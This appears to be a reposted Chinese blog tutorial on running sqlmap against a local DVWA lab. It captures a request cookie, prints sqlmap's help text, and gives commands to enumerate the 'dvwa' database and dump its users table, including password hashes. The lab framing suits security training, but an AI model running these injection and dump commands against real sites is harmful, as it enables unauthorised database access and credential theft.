sqlmap(一)

Sqlmap是一款开源的命令行自动SQL注入工具。它能够对多种主流数据库进行扫描支持。

1.启动xampp

sqlmap(一)_第1张图片


2.测试的网站是DVWA,security level设为medium,因为在sqlmap中安全等级设为low,medium,high都是一样的操作步骤。

sqlmap(一)_第2张图片

3.启动Tamper Data(tools->tamper data)

sqlmap(一)_第3张图片

4.测试一下

sqlmap(一)_第4张图片

5.得到了request header

Host=127.0.0.1
User-Agent=Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
Accept=*/*
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=https://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit
Cookie=security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454

6.在终端用sqlmap

sqlmap的一些用法:


     
     
     
     
  1. root@kali:~ # sqlmap -h
  2. Usage: python sqlmap [options]
  3. Options:
  4. -h, –help Show basic help message and exit
  5. -hh Show advanced help message and exit
  6. –version Show program ’s version number and exit
  7. -v VERBOSE Verbosity level: 0 -6 ( default 1)
  8. Target:
  9. At least one of these options has to be provided to define the
  10. target(s)
  11. -u URL, –url=URL Target URL (e.g. ”http://www.site.com/vuln.php?id=1”)
  12. -g GOOGLEDORK Process Google dork results as target URLs
  13. Request:
  14. These options can be used to specify how to connect to the target URL
  15. –data=DATA Data string to be sent through POST
  16. –cookie=COOKIE HTTP Cookie header value
  17. –random-agent Use randomly selected HTTP User-Agent header value
  18. –proxy=PROXY Use a proxy to connect to the target URL
  19. –tor Use Tor anonymity network
  20. –check-tor Check to see if Tor is used properly
  21. Injection:
  22. These options can be used to specify which parameters to test for,
  23. provide custom injection payloads and optional tampering scripts
  24. -p TESTPARAMETER Testable parameter(s)
  25. –dbms=DBMS Force back- end DBMS to this value
  26. Detection:
  27. These options can be used to customize the detection phase
  28. –level=LEVEL Level of tests to perform ( 1 -5, default 1)
  29. –risk=RISK Risk of tests to perform ( 0 -3, default 1)
  30. Techniques:
  31. These options can be used to tweak testing of specific SQL injection
  32. techniques
  33. –technique=TECH SQL injection techniques to use ( default ”BEUSTQ”)
  34. Enumeration:
  35. These options can be used to enumerate the back- end database
  36. management system information, structure and data contained in the
  37. tables. Moreover you can run your own SQL statements
  38. -a, –all Retrieve everything
  39. -b, –banner Retrieve DBMS banner
  40. –current-user Retrieve DBMS current user
  41. –current-db Retrieve DBMS current database
  42. –passwords Enumerate DBMS users password hashes
  43. –tables Enumerate DBMS database tables
  44. –columns Enumerate DBMS database table columns
  45. –schema Enumerate DBMS schema
  46. –dump Dump DBMS database table entries
  47. –dump-all Dump all DBMS databases tables entries
  48. -D DB DBMS database to enumerate
  49. -T TBL DBMS database table(s) to enumerate
  50. -C COL DBMS database table column(s) to enumerate
  51. Operating system access:
  52. These options can be used to access the back- end database management
  53. system underlying operating system
  54. –os-shell Prompt for an interactive operating system shell
  55. –os-pwn Prompt for an OOB shell, Meterpreter or VNC
  56. General:
  57. These options can be used to set some general working parameters
  58. –batch Never ask for user input, use the default behaviour
  59. –flush-session Flush session files for current target
  60. Miscellaneous:
  61. –sqlmap-shell Prompt for an interactive sqlmap shell
  62. –wizard Simple wizard interface for beginner users
  63. [!] to see full list of options run with ’-hh’
  64. root@kali:~ #

sqlmap -u ‘http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit’ –cookie=’security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454’ –dbs

sqlmap(一)_第5张图片

sqlmap -u ‘http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit’ –cookie=’security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454’ -D dvwa –tables

sqlmap(一)_第6张图片

sqlmap -u ‘http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit’ –cookie=’security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454’ -D dvwa -T users –columns

sqlmap(一)_第7张图片

sqlmap -u ‘http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit’ –cookie=’security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454’ -D dvwa -T users –columns –dump

sqlmap(一)_第8张图片

sqlmap的–dump选项,可以轻易的获得后台数据库的所有用户账户名和口令哈希。

            

你可能感兴趣的:(KaliLinux)